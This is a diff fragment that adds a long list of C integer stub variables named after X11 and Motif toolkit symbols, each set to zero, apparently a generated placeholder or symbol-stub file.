+int XGetSelectionOwner = 0;
+int XGetWindowAttributes = 0;
+int XGetWindowProperty = 0;
+int XGetWMColormapWindows = 0;
+int XGrabKeyboard = 0;
+int XGrabPointer = 0;
+int XGrabServer = 0;
+int XHeightOfScreen = 0;
+int xiColumnConstraintExtension = 0;
+int XiCreateStippledPixmap = 0;
+int _XiGetTabIndex = 0;
+int XIMOfIC = 0;
+int XInstallColormap = 0;
+int XInternAtom = 0;
+int XInternAtoms = 0;
+int XIntersectRegion = 0;
+int XiReleaseStippledPixmap = 0;
+int _XiResolveAllPartOffsets = 0;
+int XiResolveAllPartOffsets = 0;
+int XKeysymToKeycode = 0;
+int XKeysymToString = 0;
+int XLastKnownRequestProcessed = 0;
+int XListFonts = 0;
+int XListInstalledColormaps = 0;
+int XLoadQueryFont = 0;
+int XLookupString = 0;
+int Xm18IListUnselectAllItems = 0;
+int Xm18IListUnselectItem = 0;
+int _XmAccessColorData = 0;
+int XmActivateProtocol = 0;
+int _XmAddCallback = 0;
+int _XmAddGrab = 0;
+int _XmAddHashEntry = 0;
+int XmAddProtocolCallback = 0;
+int XmAddProtocols = 0;
+int _Xm_AddQueue = 0;
+int XmAddTabGroup = 0;
+int _XmAddTearOffEventHandlers = 0;
+int _XmAddToColorCache = 0;
+int XmAddToPostFromList = 0;
+int _XmAllocHashTable = 0;
+int _XmAllocMotifAtom = 0;
+int _XmAllocReceiverInfo = 0;
+int _XmAllocScratchPixmap = 0;
+int _XmAllowAcceleratedInsensitiveUnmanagedMenuItems = 0;
+int XMapRaised = 0;
+int XMapWindow = 0;
+int _XmArrowB_defaultTranslations = 0;
+int xmArrowButtonClassRec = 0;
+int xmArrowButtonGadgetClass = 0;
+int xmArrowButtonGadgetClassRec = 0;
+int xmArrowButtonWidgetClass = 0;
+int _XmArrowPixmapCacheCompare = 0;
+int _XmArrowPixmapCacheDelete = 0;
+int _XmAssignInsensitiveColor = 0;
+int _XmAssignLabG_MarginBottom = 0;
+int _XmAssignLabG_MarginHeight = 0;
+int _XmAssignLabG_MarginLeft = 0;
+int _XmAssignLabG_MarginRight = 0;
+int _XmAssignLabG_MarginTop = 0;
+int _XmAssignLabG_MarginWidth = 0;
+int XMaxRequestSize = 0;
+int _XmBackgroundColorDefault = 0;
+int _XmBaseClassPartInitialize = 0;
+int _XmBB_CreateButtonG = 0;
+int _XmBB_CreateLabelG = 0;
+int _XmBB_GetDialogTitle = 0;
+int _XmBBUpdateDynDefaultButton = 0;
+int XmbDrawImageString = 0;
+int XmbDrawString = 0;
+int _XmBlackPixel = 0;
+int XmbLookupString = 0;
+int _XmBottomShadowColorDefault = 0;
+int XmbResetIC = 0;
+int XmbTextEscapement = 0;
+int XmbTextExtents = 0;
+int XmbTextListToTextProperty = 0;
+int XmbTextPropertyToTextList = 0;
+int _XmBuildExtResources = 0;
+int _XmBuildGadgetResources = 0;
+int _XmBuildManagerResources = 0;
+int _XmBuildPrimitiveResources = 0;
+int _XmBuildResources = 0;
+int _XmBulletinB_defaultTranslations = 0;
+int _XmBulletinBoardCancel = 0;
+int xmBulletinBoardClassRec = 0;
+int _XmBulletinBoardFocusMoved = 0;
+int _XmBulletinBoardMap = 0;
+int _XmBulletinBoardReturn = 0;
+int _XmBulletinBoardSetDefaultShadow = 0;
+int _XmBulletinBoardSetDynDefaultButton = 0;
+int _XmBulletinBoardSizeUpdate = 0;
+int xmBulletinBoardWidgetClass = 0;
+int xmButtonBoxClassRec = 0;
+int xmButtonBoxWidgetClass = 0;
+int _XmButtonPopdownChildren = 0;
+int _XmButtonTakeFocus = 0;
+int _XmByteOrderChar = 0;
+int _XmCacheCopy = 0;
+int _XmCacheDelete = 0;
+int _XmCachePart = 0;
+int _XmCachePixmap = 0;
+int _XmCalcLabelDimensions = 0;
+int _XmCalcLabelGDimensions = 0;
+int _XmCallCallbackList = 0;
+int _XmCallFocusMoved = 0;
+int _XmCallRowColumnMapCallback = 0;
+int _XmCallRowColumnUnmapCallback = 0;
+int _XmCascadeB_menubar_events = 0;
+int _XmCascadeB_p_events = 0;
+int _XmCascadeBPrimClassExtRec = 0;
+int xmCascadeButtonClassRec = 0;
+int xmCascadeButtonGadgetClass = 0;
+int xmCascadeButtonGadgetClassRec = 0;
+int XmCascadeButtonGadgetHighlight = 0;
+int xmCascadeButtonGCacheObjClassRec = 0;
+int XmCascadeButtonHighlight = 0;
+int xmCascadeButtonWidgetClass = 0;
+int _XmCascadingPopup = 0;
+int _XmCBHelp = 0;
+int _XmCBNameActivate = 0;
+int _XmCBNameValueChanged = 0;
+int XmChangeColor = 0;
+int _XmChangeHSB = 0;
+int _XmChangeNavigationType = 0;
+int _XmChangeVSB = 0;
+int _XmCharsetCanonicalize = 0;
+int _XmCleanPixmapCache = 0;
+int _XmClearBCompatibility = 0;
+int _XmClearBGCompatibility = 0;
+int _XmClearBGPixmapName = 0;
+int _XmClearBorder = 0;
+int _XmClearDisplayTables = 0;
+int _XmClearDragReceiverInfo = 0;
+int _XmClearFocusPath = 0;
+int _XmClearIconPixmapName = 0;
+int _XmClearKbdFocus = 0;
+int _XmClearRect = 0;
+int _XmClearShadowType = 0;
+int _XmClearTabGroup = 0;
+int _XmClearTraversal = 0;
+int XmClipboardBeginCopy = 0;
+int XmClipboardCancelCopy = 0;
+int XmClipboardCopy = 0;
+int XmClipboardCopyByName = 0;
+int XmClipboardEndCopy = 0;
+int XmClipboardEndRetrieve = 0;
+int XmClipboardInquireCount = 0;
+int XmClipboardInquireFormat = 0;
+int XmClipboardInquireLength = 0;
+int XmClipboardInquirePendingItems = 0;
+int XmClipboardLock = 0;
+int _XmClipboardPassType = 0;
+int XmClipboardRegisterFormat = 0;
+int XmClipboardRetrieve = 0;
+int XmClipboardStartCopy = 0;
+int XmClipboardStartRetrieve = 0;
+int XmClipboardUndoCopy = 0;
+int XmClipboardUnlock = 0;
+int XmClipboardWithdrawFormat = 0;
+int xmClipWindowClassRec = 0;
+int _XmClipWindowTranslationTable = 0;
+int xmClipWindowWidgetClass = 0;
+int _XmColorObjCache = 0;
+int _XmColorObjCacheDisplay = 0;
+int xmColorObjClass = 0;
+int xmColorObjClassRec = 0;
+int _XmColorObjCreate = 0;
+int xmColorSelectorClassRec = 0;
+int xmColorSelectorWidgetClass = 0;
+int xmColumnClassRec = 0;
+int xmColumnWidgetClass = 0;
+int xmCombinationBox2ClassRec = 0;
+int XmCombinationBox2GetArrow = 0;
+int XmCombinationBox2GetChild = 0;
+int XmCombinationBox2GetLabel = 0;
+int XmCombinationBox2GetList = 0;
+int XmCombinationBox2GetText = 0;
+int XmCombinationBox2GetValue = 0;
+int xmCombinationBox2WidgetClass = 0;
+int XmCombinationBoxGetValue = 0;
+int XmComboBoxAddItem = 0;
+int xmComboBoxClassRec = 0;
+int _XmComboBox_defaultAccelerators = 0;
+int _XmComboBox_defaultTranslations = 0;
+int XmComboBoxDeletePos = 0;
+int _XmComboBox_dropDownComboBoxAccelerators = 0;
+int _XmComboBox_dropDownListTranslations = 0;
+int XmComboBoxSelectItem = 0;
+int XmComboBoxSetItem = 0;
+int _XmComboBox_textFocusTranslations = 0;
+int XmComboBoxUpdate = 0;
+int xmComboBoxWidgetClass = 0;
+int XmCommandAppendValue = 0;
+int xmCommandClassRec = 0;
+int XmCommandError = 0;
+int XmCommandGetChild = 0;
+int _XmCommandReturn = 0;
+int XmCommandSetValue = 0;
+int _XmCommandUpOrDown = 0;
+int xmCommandWidgetClass = 0;
+int XmCompareISOLatin1 = 0;
+int XmCompareXtWidgetGeometry = 0;
+int XmCompareXtWidgetGeometryToWidget = 0;
+int _XmComputeVisibilityRect = 0;
+int _XmConfigureObject = 0;
+int _XmConfigureWidget = 0;
+int xmContainerClassRec = 0;
+int XmContainerCopy = 0;
+int XmContainerCopyLink = 0;
+int XmContainerCut = 0;
+int _XmContainer_defaultTranslations = 0;
+int XmContainerGetItemChildren = 0;
+int XmContainerPaste = 0;
+int XmContainerPasteLink = 0;
+int XmContainerRelayout = 0;
+int XmContainerReorder = 0;
+int _XmContainer_traversalTranslations = 0;
+int xmContainerWidgetClass = 0;
+int _XmConvertActionParamToRepTypeId = 0;
+int _XmConvertComplete = 0;
+int _XmConvertCSToString = 0;
+int _XmConvertFactor = 0;
+int _XmConvertFloatUnitsToIntUnits = 0;
+int _XmConvertHandler = 0;
+int _XmConvertHandlerSetLocal = 0;
+int _XmConvertStringToUnits = 0;
+int XmConvertStringToUnits = 0;
+int _XmConvertToBW = 0;
+int _XmConvertUnits = 0;
+int XmConvertUnits = 0;
+int _XmCopyCursorIconQuark = 0;
+int XmCopyISOLatin1Lowered = 0;
+int _XmCountVaList = 0;
+int XmCreateArrowButton = 0;
+int XmCreateArrowButtonGadget = 0;
+int _XmCreateArrowPixmaps = 0;
+int XmCreateBulletinBoard = 0;
+int XmCreateBulletinBoardDialog = 0;
+int XmCreateButtonBox = 0;
+int XmCreateCascadeButton = 0;
+int XmCreateCascadeButtonGadget = 0;
+int XmCreateColorSelector = 0;
+int XmCreateColumn = 0;
+int XmCreateCombinationBox2 = 0;
+int XmCreateComboBox = 0;
+int XmCreateCommand = 0;
+int XmCreateCommandDialog = 0;
+int XmCreateContainer = 0;
+int XmCreateDataField = 0;
+int XmCreateDialogShell = 0;
+int XmCreateDragIcon = 0;
+int XmCreateDrawingArea = 0;
+int XmCreateDrawnButton = 0;
+int XmCreateDropDown = 0;
+int XmCreateDropDownComboBox = 0;
+int XmCreateDropDownList = 0;
+int XmCreateErrorDialog = 0;
+int XmCreateExt18List = 0;
+int XmCreateExtended18List = 0;
+int XmCreateFileSelectionBox = 0;
+int XmCreateFileSelectionDialog = 0;
+int _XmCreateFocusData = 0;
+int XmCreateFontSelector = 0;
+int XmCreateForm = 0;
+int XmCreateFormDialog = 0;
+int XmCreateFrame = 0;
+int XmCreateGrabShell = 0;
+int XmCreateIconBox = 0;
+int XmCreateIconButton = 0;
+int XmCreateIconGadget = 0;
+int XmCreateIconHeader = 0;
+int XmCreateInformationDialog = 0;
+int XmCreateLabel = 0;
+int XmCreateLabelGadget = 0;
+int XmCreateList = 0;
+int XmCreateMainWindow = 0;
+int XmCreateMenuBar = 0;
+int _XmCreateMenuCursor = 0;
+int XmCreateMenuShell = 0;
+int XmCreateMessageBox = 0;
+int XmCreateMessageDialog = 0;
+int XmCreateMultiList = 0;
+int XmCreateNotebook = 0;
+int XmCreateOptionMenu = 0;
+int XmCreateOutline = 0;
+int XmCreatePaned = 0;
+int XmCreatePanedWindow = 0;
+int XmCreatePopupMenu = 0;
+int XmCreatePromptDialog = 0;
+int XmCreatePulldownMenu = 0;
+int XmCreatePushButton = 0;
+int XmCreatePushButtonGadget = 0;
+int XmCreateQuestionDialog = 0;
+int XmCreateRadioBox = 0;
+int _XmCreateRenderTable = 0;
+int _XmCreateRendition = 0;
+int XmCreateRowColumn = 0;
+int XmCreateScale = 0;
+int XmCreateScrollBar = 0;
+int XmCreateScrolledList = 0;
+int XmCreateScrolledText = 0;
+int XmCreateScrolledWindow = 0;
+int XmCreateSelectionBox = 0;
+int XmCreateSelectionDialog = 0;
+int XmCreateSeparator = 0;
+int XmCreateSeparatorGadget = 0;
+int XmCreateSimpleCheckBox = 0;
+int XmCreateSimpleMenuBar = 0;
+int XmCreateSimpleOptionMenu = 0;
+int XmCreateSimplePopupMenu = 0;
+int XmCreateSimplePulldownMenu = 0;
+int XmCreateSimpleRadioBox = 0;
+int XmCreateSimpleSpinBox = 0;
+int XmCreateSpinBox = 0;
+int _XmCreateTab = 0;
+int XmCreateTabBox = 0;
+int _XmCreateTabList = 0;
+int XmCreateTabStack = 0;
+int XmCreateTemplateDialog = 0;
+int XmCreateText = 0;
+int XmCreateTextField = 0;
+int XmCreateToggleButton = 0;
+int XmCreateToggleButtonGadget = 0;
+int XmCreateTree = 0;
+int _XmCreateVisibilityRect = 0;
+int XmCreateWarningDialog = 0;
+int XmCreateWorkArea = 0;
+int XmCreateWorkingDialog = 0;
+int XmCvtByteStreamToXmString = 0;
+int XmCvtCTToXmString = 0;
+int XmCvtFromHorizontalPixels = 0;
+int XmCvtFromVerticalPixels = 0;
+int XmCvtStringToUnitType = 0;
+int XmCvtTextPropertyToXmStringTable = 0;
+int XmCvtTextToXmString = 0;
+int XmCvtToHorizontalPixels = 0;
+int XmCvtToVerticalPixels = 0;
+int XmCvtXmStringTableToTextProperty = 0;
+int XmCvtXmStringToByteStream = 0;
+int _XmCvtXmStringToCT = 0;
+int XmCvtXmStringToCT = 0;
+int XmCvtXmStringToText = 0;
+int _XmCvtXmStringToUTF8String = 0;
+int XmCvtXmStringToUTF8String = 0;
+int _XmDataF_EventBindings1 = 0;
+int _XmDataF_EventBindings2 = 0;
+int _XmDataF_EventBindings3 = 0;
+int _XmDataF_EventBindings4 = 0;
+int xmDataFieldClassRec = 0;
+int _XmDataFieldConvert = 0;
+int XmDataFieldCopy = 0;
+int _XmDataFieldCountBytes = 0;
+int XmDataFieldCut = 0;
+int _XmDataFieldDeselectSelection = 0;
+int XmDataFielddf_ClearSelection = 0;
+int _XmDataFielddf_SetCursorPosition = 0;
+int XmDataFielddf_SetCursorPosition = 0;
+int _XmDataFielddf_SetDestination = 0;
+int _XmDataFieldDrawInsertionPoint = 0;
+int XmDataFieldGetAddMode = 0;
+int XmDataFieldGetBaseline = 0;
+int XmDataFieldGetCursorPosition = 0;
+int _XmDataFieldGetDropReciever = 0;
+int XmDataFieldGetEditable = 0;
+int XmDataFieldGetInsertionPosition = 0;
+int XmDataFieldGetLastPosition = 0;
+int XmDataFieldGetMaxLength = 0;
+int XmDataFieldGetSelection = 0;
+int XmDataFieldGetSelectionPosition = 0;
+int XmDataFieldGetSelectionWcs = 0;
+int XmDataFieldGetString = 0;
+int XmDataFieldGetStringWcs = 0;
+int XmDataFieldGetSubstring = 0;
+int XmDataFieldGetSubstringWcs = 0;
+int XmDataFieldInsert = 0;
+int XmDataFieldInsertWcs = 0;
+int _XmDataFieldLoseSelection = 0;
+int XmDataFieldPaste = 0;
+int XmDataFieldPosToXY = 0;
+int XmDataFieldRemove = 0;
+int XmDataFieldReplace = 0;
+int _XmDataFieldReplaceText = 0;
+int XmDataFieldReplaceWcs = 0;
+int XmDataFieldSetAddMode = 0;
+int _XmDataFieldSetClipRect = 0;
+int XmDataFieldSetEditable = 0;
+int XmDataFieldSetHighlight = 0;
+int XmDataFieldSetInsertionPosition = 0;
+int XmDataFieldSetMaxLength = 0;
+int _XmDataFieldSetSel2 = 0;
+int XmDataFieldSetSelection = 0;
+int XmDataFieldSetString = 0;
+int XmDataFieldShowPosition = 0;
+int _XmDataFieldStartSelection = 0;
+int xmDataFieldWidgetClass = 0;
+int XmDataFieldXYToPos = 0;
+int _XmDataFPrimClassExtRec = 0;
+int _XmDataFToggleCursorGC = 0;
+int XmDeactivateProtocol = 0;
+int _XmDefaultColorObj = 0;
+int _XmDefaultDragIconQuark = 0;
+int _XmdefaultTextActionsTable = 0;
+int _XmdefaultTextActionsTableSize = 0;
+int _XmDefaultVisualResources = 0;
+int xmDesktopClass = 0;
+int xmDesktopClassRec = 0;
+int xmDesktopObjectClass = 0;
+int _XmDestinationHandler = 0;
+int _XmDestroyDefaultDragIcon = 0;
+int _XmDestroyFocusData = 0;
+int _XmDestroyMotifWindow = 0;
+int _XmDestroyParentCallback = 0;
+int XmDestroyPixmap = 0;
+int _XmDestroyTearOffShell = 0;
+int xmDialogShellClassRec = 0;
+int xmDialogShellExtClassRec = 0;
+int xmDialogShellExtObjectClass = 0;
+int xmDialogShellWidgetClass = 0;
+int _XmDifferentBackground = 0;
+int _XmDirectionDefault = 0;
+int XmDirectionMatch = 0;
+int XmDirectionMatchPartial = 0;
+int XmDirectionToStringDirection = 0;
+int _XmDismissTearOff = 0;
+int _XmDispatchGadgetInput = 0;
+int _XmDisplay_baseTranslations = 0;
+int xmDisplayClass = 0;
+int xmDisplayClassRec = 0;
+int xmDisplayObjectClass = 0;
+int _XmDoGadgetTraversal = 0;
+int XmDragCancel = 0;
+int _XmDragC_defaultTranslations = 0;
+int xmDragContextClass = 0;
+int xmDragContextClassRec = 0;
+int xmDragIconClassRec = 0;
+int _XmDragIconClean = 0;
+int _XmDragIconIsDirty = 0;
+int xmDragIconObjectClass = 0;
+int _XmDragOverChange = 0;
+int _XmDragOverFinish = 0;
+int _XmDragOverGetActiveCursor = 0;
+int _XmDragOverHide = 0;
+int _XmDragOverMove = 0;
+int _XmDragOverSetInitialPosition = 0;
+int xmDragOverShellClassRec = 0;
+int xmDragOverShellWidgetClass = 0;
+int _XmDragOverShow = 0;
+int XmDragStart = 0;
+int _XmDragUnderAnimation = 0;
+int _XmDrawArrow = 0;
+int XmDrawBevel = 0;
+int _XmDrawBorder = 0;
+int _XmDrawDiamond = 0;
+int _XmDrawDiamondButton = 0;
+int _XmDrawHighlight = 0;
+int _XmDrawingA_defaultTranslations = 0;
+int xmDrawingAreaClassRec = 0;
+int _XmDrawingAreaInput = 0;
+int xmDrawingAreaWidgetClass = 0;
+int _XmDrawingA_traversalTranslations = 0;
+int _XmDrawnB_defaultTranslations = 0;
+int _XmDrawnB_menuTranslations = 0;
+int _XmDrawnBPrimClassExtRec = 0;
+int xmDrawnButtonClassRec = 0;
+int xmDrawnButtonWidgetClass = 0;
+int _XmDrawSeparator = 0;
+int _XmDrawShadow = 0;
+int _XmDrawShadows = 0;
+int _XmDrawShadowType = 0;
+int _XmDrawSimpleHighlight = 0;
+int _XmDrawSquareButton = 0;
+int xmDropDownClassRec = 0;
+int XmDropDownGetArrow = 0;
+int XmDropDownGetChild = 0;
+int XmDropDownGetLabel = 0;
+int XmDropDownGetList = 0;
+int XmDropDownGetText = 0;
+int XmDropDownGetValue = 0;
+int xmDropDownWidgetClass = 0;
+int XmDropSiteConfigureStackingOrder = 0;
+int XmDropSiteEndUpdate = 0;
+int XmDropSiteGetActiveVisuals = 0;
+int xmDropSiteManagerClassRec = 0;
+int xmDropSiteManagerObjectClass = 0;
+int XmDropSiteQueryStackingOrder = 0;
+int XmDropSiteRegister = 0;
+int XmDropSiteRegistered = 0;
+int XmDropSiteRetrieve = 0;
+int _XmDropSiteShell = 0;
+int XmDropSiteStartUpdate = 0;
+int XmDropSiteUnregister = 0;
+int XmDropSiteUpdate = 0;
+int _XmDropSiteWrapperCandidate = 0;
+int XmDropTransferAdd = 0;
+int xmDropTransferClassRec = 0;
+int xmDropTransferObjectClass = 0;
+int XmDropTransferStart = 0;
+int _XmDSIAddChild = 0;
+int _XmDSIDestroy = 0;
+int _XmDSIGetBorderWidth = 0;
+int _XmDSIGetChildPosition = 0;
+int _XmDSIRemoveChild = 0;
+int _XmDSIReplaceChild = 0;
+int _XmDSISwapChildren = 0;
+int _XmDSMGetTreeFromDSM = 0;
+int _XmDSMUpdate = 0;
+int _XmDSResources = 0;
+int XmeAddFocusChangeCallback = 0;
+int XmeClearBorder = 0;
+int XmeClipboardSink = 0;
+int XmeClipboardSource = 0;
+int XmeConfigureObject = 0;
+int XmeConvertMerge = 0;
+int XmeCountVaListSimple = 0;
+int XmeCreateClassDialog = 0;
+int _XmEditResCheckMessages = 0;
+int XmeDragSource = 0;
+int XmeDrawArrow = 0;
+int XmeDrawCircle = 0;
+int XmeDrawDiamond = 0;
+int XmeDrawHighlight = 0;
+int XmeDrawIndicator = 0;
+int XmeDrawPolygonShadow = 0;
+int XmeDrawSeparator = 0;
+int XmeDrawShadows = 0;
+int XmeDropSink = 0;
+int XmeFlushIconFileCache = 0;
+int XmeFocusIsInShell = 0;
+int XmeFromHorizontalPixels = 0;
+int XmeFromVerticalPixels = 0;
+int XmeGetColorObjData = 0;
+int XmeGetDefaultPixel = 0;
+int XmeGetDefaultRenderTable = 0;
+int XmeGetDesktopColorCells = 0;
+int XmeGetDirection = 0;
+int XmeGetEncodingAtom = 0;
+int XmeGetHomeDirName = 0;
+int XmeGetIconControlInfo = 0;
+int XmeGetLocalizedString = 0;
+int XmeGetMask = 0;
+int XmeGetNextCharacter = 0;
+int XmeGetNullCursor = 0;
+int XmeGetPixelData = 0;
+int XmeGetPixmapData = 0;
+int XmeGetTextualDragIcon = 0;
+int XmeMicroSleep = 0;
+int _XmEmptyRect = 0;
+int XmeNamedSink = 0;
+int XmeNamedSource = 0;
+int XmeNamesAreEqual = 0;
+int XmeNavigChangeManaged = 0;
+int _XmEnterGadget = 0;
+int _XmEnterRowColumn = 0;
+int _XmEntryByteCountGet = 0;
+int _XmEntryCacheGet = 0;
+int _XmEntryCharCountGet = 0;
+int _XmEntryDirectionGet = 0;
+int _XmEntryDirectionSet = 0;
+int _XmEntryPopGet = 0;
+int _XmEntryPushGet = 0;
+int _XmEntryRendBeginCountGet = 0;
+int _XmEntryRendBeginGet = 0;
+int _XmEntryRendBeginSet = 0;
+int _XmEntryRendEndCountGet = 0;
+int _XmEntryRendEndGet = 0;
+int _XmEntryRendEndSet = 0;
+int _XmEntryTabsGet = 0;
+int _XmEntryTag = 0;
+int _XmEntryTagSet = 0;
+int _XmEntryTextGet = 0;
+int _XmEntryTextSet = 0;
+int _XmEntryTextTypeGet = 0;
+int XmeParseUnits = 0;
+int XmePrimarySink = 0;
+int XmePrimarySource = 0;
+int XmeQueryBestCursorSize = 0;
+int _XmEraseShadow = 0;
+int XmeRedisplayGadgets = 0;
+int XmeRemoveFocusChangeCallback = 0;
+int XmeRenderTableGetDefaultFont = 0;
+int XmeReplyToQueryGeometry = 0;
+int XmeResolvePartOffsets = 0;
+int XmeSecondarySink = 0;
+int XmeSecondarySource = 0;
+int XmeSecondaryTransfer = 0;
+int XmeSetWMShellTitle = 0;
+int XmeStandardConvert = 0;
+int XmeStandardTargets = 0;
+int XmeStringGetComponent = 0;
+int XmeStringIsValid = 0;
+int XmeToHorizontalPixels = 0;
+int XmeToVerticalPixels = 0;
+int XmeTraitGet = 0;
+int XmeTraitSet = 0;
+int XmeTransferAddDoneProc = 0;
+int XmeUseColorObj = 0;
+int XmeVirtualToActualKeysyms = 0;
+int XmeVLCreateWidget = 0;
+int XmeWarning = 0;
+int XME_WARNING = 0;
+int XmeXpmAttributesSize = 0;
+int XmeXpmCreateBufferFromImage = 0;
+int XmeXpmCreateBufferFromPixmap = 0;
+int XmeXpmCreateBufferFromXpmImage = 0;
+int XmeXpmCreateDataFromImage = 0;
+int XmeXpmCreateDataFromPixmap = 0;
+int XmeXpmCreateDataFromXpmImage = 0;
+int XmeXpmCreateImageFromBuffer = 0;
+int XmeXpmCreateImageFromData = 0;
+int XmeXpmCreateImageFromXpmImage = 0;
+int XmeXpmCreatePixmapFromBuffer = 0;
+int XmeXpmCreatePixmapFromData = 0;
+int XmeXpmCreatePixmapFromXpmImage = 0;
+int XmeXpmCreateXpmImageFromBuffer = 0;
+int XmeXpmCreateXpmImageFromData = 0;
+int XmeXpmCreateXpmImageFromImage = 0;
+int XmeXpmCreateXpmImageFromPixmap = 0;
+int XmeXpmFree = 0;
+int XmeXpmFreeAttributes = 0;
+int XmeXpmFreeExtensions = 0;
+int XmeXpmFreeXpmImage = 0;
+int XmeXpmFreeXpmInfo = 0;
+int XmeXpmGetErrorString = 0;
+int XmeXpmLibraryVersion = 0;
+int XmeXpmReadFileToBuffer = 0;
+int XmeXpmReadFileToData = 0;
+int XmeXpmReadFileToImage = 0;
+int XmeXpmReadFileToPixmap = 0;
+int XmeXpmReadFileToXpmImage = 0;
+int XmeXpmWriteFileFromBuffer = 0;
+int XmeXpmWriteFileFromData = 0;
+int XmeXpmWriteFileFromImage = 0;
+int XmeXpmWriteFileFromPixmap = 0;
+int XmeXpmWriteFileFromXpmImage = 0;
+int xmExt18ListClassRec = 0;
+int XmExt18ListDeselectItems = 0;
+int XmExt18ListDeselectRow = 0;
+int XmExt18ListGetSelectedRowArray = 0;
+int XmExt18ListGetSelectedRows = 0;
+int XmExt18ListMakeRowVisible = 0;
+int XmExt18ListSelectAllItems = 0;
+int XmExt18ListSelectItems = 0;
+int XmExt18ListSelectRow = 0;
+int XmExt18ListToggleRow = 0;
+int XmExt18ListUnselectAllItems = 0;
+int XmExt18ListUnselectItem = 0;
+int xmExt18ListWidgetClass = 0;
+int xmExtClassRec = 0;
+int _XmExtGetValuesHook = 0;
+int _XmExtHighlightBorder = 0;
+int _XmExtImportArgs = 0;
+int _XmExtObjAlloc = 0;
+int xmExtObjectClass = 0;
+int _XmExtObjFree = 0;
+int _XmExtUnhighlightBorder = 0;
+int _Xm_fastPtr = 0;
+int _XmFastSubclassInit = 0;
+int _XmFileSBGeoMatrixCreate = 0;
+int xmFileSelectionBoxClassRec = 0;
+int _XmFileSelectionBoxCreateDirList = 0;
+int _XmFileSelectionBoxCreateDirListLabel = 0;
+int _XmFileSelectionBoxCreateFilterLabel = 0;
+int _XmFileSelectionBoxCreateFilterText = 0;
+int _XmFileSelectionBoxFocusMoved = 0;
+int XmFileSelectionBoxGetChild = 0;
+int _XmFileSelectionBoxGetDirectory = 0;
+int _XmFileSelectionBoxGetDirListItemCount = 0;
+int _XmFileSelectionBoxGetDirListItems = 0;
+int _XmFileSelectionBoxGetDirListLabelString = 0;
+int _XmFileSelectionBoxGetDirMask = 0;
+int _XmFileSelectionBoxGetFilterLabelString = 0;
+int _XmFileSelectionBoxGetListItemCount = 0;
+int _XmFileSelectionBoxGetListItems = 0;
+int _XmFileSelectionBoxGetNoMatchString = 0;
+int _XmFileSelectionBoxGetPattern = 0;
+int _XmFileSelectionBoxNoGeoRequest = 0;
+int _XmFileSelectionBoxRestore = 0;
+int _XmFileSelectionBoxUpOrDown = 0;
+int xmFileSelectionBoxWidgetClass = 0;
+int XmFileSelectionDoSearch = 0;
+int _XmFilterArgs = 0;
+int _XmFilterResources = 0;
+int _XmFindNextTabGroup = 0;
+int _XmFindPrevTabGroup = 0;
+int _XmFindTabGroup = 0;
+int _XmFindTopMostShell = 0;
+int _XmFindTraversablePrim = 0;
+int _XmFocusInGadget = 0;
+int _XmFocusIsHere = 0;
+int _XmFocusIsInShell = 0;
+int _XmFocusModelChanged = 0;
+int _XmFocusOutGadget = 0;
+int XmFontListAdd = 0;
+int XmFontListAppendEntry = 0;
+int XmFontListCopy = 0;
+int XmFontListCreate = 0;
+int XmFontListCreate_r = 0;
+int XmFontListEntryCreate = 0;
+int XmFontListEntryCreate_r = 0;
+int XmFontListEntryFree = 0;
+int XmFontListEntryGetFont = 0;
+int XmFontListEntryGetTag = 0;
+int XmFontListEntryLoad = 0;
+int XmFontListFree = 0;
+int XmFontListFreeFontContext = 0;
+int _XmFontListGetDefaultFont = 0;
+int XmFontListGetNextFont = 0;
+int XmFontListInitFontContext = 0;
+int XmFontListNextEntry = 0;
+int XmFontListRemoveEntry = 0;
+int _XmFontListSearch = 0;
+int xmFontSelectorClassRec = 0;
+int xmFontSelectorWidgetClass = 0;
+int _XmForegroundColorDefault = 0;
+int xmFormClassRec = 0;
+int xmFormWidgetClass = 0;
+int xmFrameClassRec = 0;
+int _XmFrame_defaultTranslations = 0;
+int xmFrameWidgetClass = 0;
+int _XmFreeDragReceiverInfo = 0;
+int _XmFreeHashTable = 0;
+int _XmFreeMotifAtom = 0;
+int _XmFreeScratchPixmap = 0;
+int _XmFreeTravGraph = 0;
+int _XmFreeWidgetExtData = 0;
+int _XmFromHorizontalPixels = 0;
+int _XmFromLayoutDirection = 0;
+int _XmFromPanedPixels = 0;
+int _XmFromVerticalPixels = 0;
+int _XmGadClassExtRec = 0;
+int _XmGadgetActivate = 0;
+int _XmGadgetArm = 0;
+int _XmGadgetButtonMotion = 0;
+int xmGadgetClass = 0;
+int xmGadgetClassRec = 0;
+int _XmGadgetDrag = 0;
+int _XmGadgetGetValuesHook = 0;
+int _XmGadgetImportArgs = 0;
+int _XmGadgetImportSecondaryArgs = 0;
+int _XmGadgetKeyInput = 0;
+int _XmGadgetMultiActivate = 0;
+int _XmGadgetMultiArm = 0;
+int _XmGadgetSelect = 0;
+int _XmGadgetTraverseCurrent = 0;
+int _XmGadgetTraverseDown = 0;
+int _XmGadgetTraverseHome = 0;
+int _XmGadgetTraverseLeft = 0;
+int _XmGadgetTraverseNext = 0;
+int _XmGadgetTraverseNextTabGroup = 0;
+int _XmGadgetTraversePrev = 0;
+int _XmGadgetTraversePrevTabGroup = 0;
+int _XmGadgetTraverseRight = 0;
+int _XmGadgetTraverseUp = 0;
+int _XmGadgetWarning = 0;
+int _XmGeoAdjustBoxes = 0;
+int _XmGeoArrangeBoxes = 0;
+int _XmGeoBoxesSameHeight = 0;
+int _XmGeoBoxesSameWidth = 0;
+int _XmGeoClearRectObjAreas = 0;
+int _XmGeoCount_kids = 0;
+int _XmGeoGetDimensions = 0;
+int _XmGeoLoadValues = 0;
+int _XmGeoMatrixAlloc = 0;
+int _XmGeoMatrixFree = 0;
+int _XmGeoMatrixGet = 0;
+int _XmGeoMatrixSet = 0;
+int _XmGeometryEqual = 0;
+int _XmGeoReplyYes = 0;
+int _XmGeoSetupKid = 0;
+int _XmGetActiveDropSite = 0;
+int _XmGetActiveItem = 0;
+int _XmGetActiveProtocolStyle = 0;
+int _XmGetActiveTabGroup = 0;
+int _XmGetActiveTopLevelMenu = 0;
+int _XmGetActualClass = 0;
+int _XmGetArrowDrawRects = 0;
+int XmGetAtomName = 0;
+int _XmGetAudibleWarning = 0;
+int _XmGetBGPixmapName = 0;
+int _XmGetBitmapConversionModel = 0;
+int _XmGetBottomShadowColor = 0;
+int _XmGetClassExtensionPtr = 0;
+int _XmGetColorAllocationProc = 0;
+int XmGetColorCalculation = 0;
+int _XmGetColorCalculationProc = 0;
+int _XmGetColoredPixmap = 0;
+int _XmGetColors = 0;
+int XmGetColors = 0;
+int _XmGetDefaultBackgroundColorSpec = 0;
+int _XmGetDefaultColors = 0;
